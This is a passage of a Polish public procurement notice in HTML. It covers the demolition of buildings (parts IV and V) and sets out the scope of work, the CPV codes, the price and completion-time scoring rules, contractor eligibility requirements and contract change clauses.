zgłoszenie)<br/>UWAGA: Wykonawca uzyska wszelkie zgody niezbędne do uzyskania prawomocnej decyzji administracyjnej na rozbiórkę budynku.<br/>- wygrodzenie terenu rozbiórki;<br/>- odcięcie, demontaż i zabezpieczenie przyłączy mediów (sieć elektroenergetyczna, sieć gazowa, sieć wodociągowa, sieć kanalizacyjna, sieć telekomunikacyjna). Wykonawca w imieniu Zamawiającego wystąpi do gestorów sieci o warunki odłączenia wszystkich przyłączy w budynku. <br/>- rozbiórka budynku jednokondygnacyjnego z poddaszem użytkowym ( wraz z dobudówkami), o wymiarach około 11,75 x 7,5m i wysokości około 5m w szczycie. Po obu stronach ściany szczytowej dobudówki o wymiarach około 5,3m x 3,15m. Rozbiórka wraz fundamentami;<br/>- rozbiórka ogrodzenia od frontu budynku (od strony ul. Wolności);<br/>- zasypanie powstałych po rozbiórce fundamentów wykopów ziemią niesortowaną bez gruzu;<br/>- dostawa humusu (min 10cm) na całą działkę, ukształtowanie terenu i zasianie trawy;<br/>- wywóz i utylizacja materiałów z rozbiórki oraz elementów wyposażenia budynków oraz przedmiotów składowanych na działce;<br/>- przedstawienie oświadczenia o utylizacji odpadów lub przedstawienie karty odpadów;<br/>- wykonanie geodezyjnej inwentaryzacji powykonawczej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Łączna cena oferty brutto – 60 pkt. = 60%<br/>Termin wykonania przedmiotu umowy – 40 pkt. = 40%<br/><br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór:<br/> <br/>C= CN/ CO x 60 pkt<br/><br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60 pkt.<br/><br/><br/>1.2 Ocena kryterium „Termin wykonania przedmiotu umowy”<br/><br/>Punkty zostaną przyznane w następujący sposób:<br/>- za wykonania przedmiotu umowy w terminie do 7 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 0 pkt.<br/>- za wykonania przedmiotu umowy w terminie do 6 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 20 pkt<br/>- za wykonania przedmiotu umowy do 5 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 40 pkt<br/>(termin wykonania przedmiotu umowy należy podać w pełnych miesiącach)<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym poda termin wykonania przedmiotu umowy dłuższy niż 7 miesięcy Zamawiający uzna, że Wykonawca nie zrealizuje zamówienia w maksymalnym dopuszczalnym terminie i odrzuci ofertę Wykonawcy jako niezgodną z zapisami SWZ.<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym nie wpisze terminu wykonania przedmiotu umowy Zamawiający przyjmie, jako podstawę do oceny, maksymalny termin wykonania przedmiotu umowy wskazany przez Zamawiającego, a oferta otrzyma w tym kryterium „0” punktów.<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów, nawet jeśli wykonawca poda krótszy termin wykonania przedmiotu umowy niż 5 miesięcy. <br/><br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty<br/>według następującej zasady:<br/><br/>CN/CO x 60 pkt + dodatkowa ilość pkt związana z kryterium poza cenowym, wg zasad przedstawionych powyżej = ............... punktów<br/><br/>Wyjaśnienia :<br/> CN - cena oferty najtańszej<br/> CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV- Rozbiórka budynku przy ul. Jana Pawła II 20a, działka nr 1191/39<br/>Zakres prac obejmuje:<br/>- wykonanie projektu rozbiórki uzgodnionego z Wojewódzkim Urzędem Ochrony Zabytków w Katowicach ( Budynek znajduje się w strefie ochrony konserwatorskiej)<br/>- uzgodnienie z Zamawiającym dokumentacji projektowej;<br/>- uzyskanie prawomocnej decyzji administracyjnej (pozwolenia na rozbiórkę lub zgłoszenie)<br/>UWAGA: Wykonawca uzyska wszelkie zgody niezbędne do uzyskania prawomocnej decyzji administracyjnej na rozbiórkę budynku.<br/>- wygrodzenie terenu rozbiórki;<br/>- rozbiórka budynku gospodarczego jednokondygnacyjnego w konstrukcji murowanej, mieszanej o wymiarach ok 4,75m x 2,5m o średniej wysokości ok 2m. Rozbiórka wraz z fundamentami;<br/>- wykonanie izolacji pionowej z mas bitumicznych budynku głównego po rozbiórce budynków gospodarczych a przed zasypaniem;<br/>- zasypanie powstałych po rozbiórce fundamentów wykopów ziemią niesortowaną bez gruzu– wyrównanie poziomu z murem oporowym;<br/>- uzupełnienie tynku na budynku mieszkalnym po rozbiórce;<br/>- wywóz i utylizacja materiałów z rozbiórki oraz elementów wyposażenia budynków i przedmiotów składowanych na działce;<br/>- przedstawienie oświadczenia o utylizacji odpadów lub przedstawienie karty odpadów;<br/>- wykonanie geodezyjnej inwentaryzacji powykonawczej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Łączna cena oferty brutto – 60 pkt. = 60%<br/>Termin wykonania przedmiotu umowy – 40 pkt. = 40%<br/><br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór:<br/> <br/>C= CN/ CO x 60 pkt<br/><br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60 pkt.<br/><br/><br/>1.2 Ocena kryterium „Termin wykonania przedmiotu umowy”<br/><br/>Punkty zostaną przyznane w następujący sposób:<br/>- za wykonania przedmiotu umowy w terminie do 7 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 0 pkt.<br/>- za wykonania przedmiotu umowy w terminie do 6 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 20 pkt<br/>- za wykonania przedmiotu umowy do 5 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 40 pkt<br/>(termin wykonania przedmiotu umowy należy podać w pełnych miesiącach)<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym poda termin wykonania przedmiotu umowy dłuższy niż 7 miesięcy Zamawiający uzna, że Wykonawca nie zrealizuje zamówienia w maksymalnym dopuszczalnym terminie i odrzuci ofertę Wykonawcy jako niezgodną z zapisami SWZ.<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym nie wpisze terminu wykonania przedmiotu umowy Zamawiający przyjmie, jako podstawę do oceny, maksymalny termin wykonania przedmiotu umowy wskazany przez Zamawiającego, a oferta otrzyma w tym kryterium „0” punktów.<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów, nawet jeśli wykonawca poda krótszy termin wykonania przedmiotu umowy niż 5 miesięcy. <br/><br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty<br/>według następującej zasady:<br/><br/>CN/CO x 60 pkt + dodatkowa ilość pkt związana z kryterium poza cenowym, wg zasad przedstawionych powyżej = ............... punktów<br/><br/>Wyjaśnienia :<br/> CN - cena oferty najtańszej<br/> CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ V - Rozbiórka budynku przy ul. Krawczyka 16, działka nr 88/33<br/>Zakres prac obejmuje:<br/>- wykonanie projektu rozbiórki wraz z uzyskaniem niezbędnych uzgodnień branżowych w sprawie odłączenia mediów przyłączonych do budynku<br/>- uzgodnienie z Zamawiającym dokumentacji projektowej;<br/>- uzyskanie prawomocnej decyzji administracyjnej (pozwolenia na rozbiórkę lub zgłoszenie)<br/>UWAGA: Wykonawca uzyska wszelkie zgody niezbędne do uzyskania prawomocnej decyzji administracyjnej na rozbiórkę budynku.<br/>- wygrodzenie terenu rozbiórki;<br/>- odcięcie, demontaż i zabezpieczenie przyłączy mediów (sieć elektroenergetyczna, sieć gazowa, sieć wodociągowa, sieć kanalizacyjna, sieć telekomunikacyjna). Wykonawca w imieniu Zamawiającego wystąpi do gestorów sieci o warunki odłączenia wszystkich przyłączy. <br/>- rozbiórka dwóch niższych segmentów budynku o wymiarach około 18,7m x 10,8m o średniej wysokości 3,5m wraz z fundamentami;<br/>- rozbiórka muru granicznego o długości 28mb (bez bramy wjazdowej wraz z murowanymi słupkami;<br/>- zasypanie powstałych po rozbiórce fundamentów wykopów ziemią niesortowaną bez gruzu;<br/>- wywóz i utylizacja materiałów z rozbiórki oraz elementów wyposażenia budynków oraz przedmiotów składowanych na działce;<br/>- przedstawienie oświadczenia o utylizacji odpadów lub przedstawienie karty odpadów;<br/>- wykonanie geodezyjnej inwentaryzacji powykonawczej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Łączna cena oferty brutto – 60 pkt. = 60%<br/>Termin wykonania przedmiotu umowy – 40 pkt. = 40%<br/><br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór:<br/> <br/>C= CN/ CO x 60 pkt<br/><br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60 pkt.<br/><br/><br/>1.2 Ocena kryterium „Termin wykonania przedmiotu umowy”<br/><br/>Punkty zostaną przyznane w następujący sposób:<br/>- za wykonania przedmiotu umowy w terminie do 7 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 0 pkt.<br/>- za wykonania przedmiotu umowy w terminie do 6 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 20 pkt<br/>- za wykonania przedmiotu umowy do 5 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 40 pkt<br/>(termin wykonania przedmiotu umowy należy podać w pełnych miesiącach)<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym poda termin wykonania przedmiotu umowy dłuższy niż 7 miesięcy Zamawiający uzna, że Wykonawca nie zrealizuje zamówienia w maksymalnym dopuszczalnym terminie i odrzuci ofertę Wykonawcy jako niezgodną z zapisami SWZ.<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym nie wpisze terminu wykonania przedmiotu umowy Zamawiający przyjmie, jako podstawę do oceny, maksymalny termin wykonania przedmiotu umowy wskazany przez Zamawiającego, a oferta otrzyma w tym kryterium „0” punktów.<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów, nawet jeśli wykonawca poda krótszy termin wykonania przedmiotu umowy niż 5 miesięcy. <br/><br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty<br/>według następującej zasady:<br/><br/>CN/CO x 60 pkt + dodatkowa ilość pkt związana z kryterium poza cenowym, wg zasad przedstawionych powyżej = ............... punktów<br/><br/>Wyjaśnienia :<br/> CN - cena oferty najtańszej<br/> CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej:<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>2.1.	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie:<br/><br/>CZĘŚĆ I<br/>a) potwierdzi wykonanie 1 roboty budowlanej polegającej na rozbiórce obiektu kubaturowego o wartości min. 70 000,00 zł brutto<br/><br/>CZĘŚĆ II<br/>a) potwierdzi wykonanie 1 roboty budowlanej polegającej na rozbiórce obiektu kubaturowego o wartości min. 65 000,00 zł brutto<br/><br/>CZĘŚĆ III<br/>a) potwierdzi wykonanie 1 roboty budowlanej polegającej na rozbiórce obiektu kubaturowego o wartości min.25 000,00 zł brutto<br/><br/>CZĘŚĆ IV<br/>a) potwierdzi wykonanie 1 roboty budowlanej polegającej na rozbiórce obiektu kubaturowego o wartości min.7 500,00 zł brutto<br/><br/>CZĘŚĆ V<br/>a) potwierdzi wykonanie 1 roboty budowlanej polegającej na rozbiórce obiektu kubaturowego o wartości min.35 000,00 zł brutto<br/><br/>Przez jedną robotę Zamawiający rozumie robotę wykonaną w ramach jednej umowy lub jednego zamówienia/zlecenia – dotyczy wszystkich części.<br/><br/>2.2) dysponuje osobami, skierowanymi do realizacji zamówienia, posiadającymi następujące kwalifikacje tj.:<br/>DLA KAŻDEJ CZĘŚCI <br/>a) dysponuje min. 1 osobą posiadającą aktualne uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej lub uprawniania budowlane w specjalności inżynieryjnej wyburzeniowej<br/><br/>Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tj. Dz. U. z 2023 poz.682 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj.Dz.U. 2023r.,poz.334 z późn.zm.), <br/><br/><br/>3.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z Wykonawców spełni warunek samodzielnie lub łącznie spełnią warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia – zgodnie z<br/>załącznikiem nr 2 do SWZ;<br/>2.Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie z załącznikiem nr 3 do SWZ;<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4.	Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 5.1-5.5 do SWZ;<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> b. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>c. oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 2 do SWZ;<br/>d. oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie z załącznikiem nr 3 do SWZ;<br/>Informacje zawarte w oświadczeniach, o którym mowa w pkt c -d stanowi wstępne potwierdzenie, że Wykonawca spełnia<br/>warunki udziału w postępowaniu i nie podlega wykluczeniu.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o którym mowa w pkt c - d składa<br/>każdy z Wykonawców.<br/>e. Jeżeli Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych<br/>podmiotów – składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje<br/>się na jego zasoby<br/>– zgodnie z załącznik nr 2A do SWZ.<br/>f. zobowiązanie innego podmiotu, o którym mowa w Rozdziale VII ust. 7 SWZ (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w ofercie składa oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej umowy może nastąpić w formie pisemnej przy zachowaniu wymogów ustawy z dn. 11 września 2019 Prawo zamówień publicznych (t.j. Dz. U. z 2023 r., poz. 1605 z późn.zm.), zgodnie ze Specyfikacją Warunków Zamówienia. <br/>2. Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty, z zastrzeżeniem, że zmiana umowy może nastąpić wyłącznie za zgodą obydwu Stron, wyrażoną na piśmie pod rygorem nieważności, jeżeli służyć będzie należytemu wykonaniu umowy.<br/>3. Zamawiający zastrzega możliwość wprowadzenia zmian postanowień zawartej umowy. w następującym zakresie oraz na następujących warunkach:<br/>1) Strony mają prawo do przedłużenia terminu wykonania Przedmiotu umowy określonego w poszczególnym zleceniu, z powodu przyczyn niezawinionych przez Wykonawcę określonych poniżej:<br/>a) wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy: administracji państwowej, samorządowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność; w szczególności dotyczy to następujących sytuacji:<br/>- opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa na dokonanie czynności,<br/>- przedłużającej się bezczynności tych organów,<br/>- odmowy wydania przez organy decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej;<br/>b) gdy wystąpią warunki atmosferyczne odbiegające od typowych dla danej pory roku, w szczególności nieprzewidziane warunki pogodowe uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonanie odbiorów (powodzie, długotrwałe ciągłe opady atmosferyczne, klęski żywiołowe i inne nietypowe dla danej pory roku anomalie pogodowe);<br/>c) wystąpi brak możliwości wykonywania robót z powodu niedopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy;<br/>d) w razie zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami; (przez siłę wyższą należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od Stron, 